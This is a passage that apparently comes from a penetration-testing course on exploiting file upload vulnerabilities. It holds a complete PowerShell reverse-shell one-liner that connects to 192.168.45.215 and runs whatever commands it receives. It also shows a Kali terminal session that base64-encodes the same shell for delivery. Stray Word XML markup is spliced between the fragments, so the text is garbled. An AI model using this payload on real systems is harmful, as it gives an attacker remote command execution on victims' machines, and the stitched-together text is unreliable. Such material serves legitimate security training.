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$client = New-Object System.Net.Sockets.TCPClient('192.168.45.215',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2&gt;&amp;1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()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 Upload Vulns 9.3.1 Using Executable Files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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding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 to encode the contents of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$Text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kali@kali:~$ pwsh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PowerShell 7.1.3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Copyright (c) Microsoft Corporation.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https://aka.ms/powershell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Type 'help' to get help.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PS&gt; $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.215",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "&gt; ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'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PS&gt; $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)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PS&gt; $EncodedText =[Convert]::ToBase64String($Bytes)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PS&gt; $EncodedText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JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0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AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA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PS&gt; exit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Listing 32 - Encoding the oneliner in PowerShell on Linux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offsec.com/courses/pen-200-44065/learning/common-web-application-attacks-44643/file-upload-vulnerabilities-44692/using-executable-files-44644#fn-local_id_719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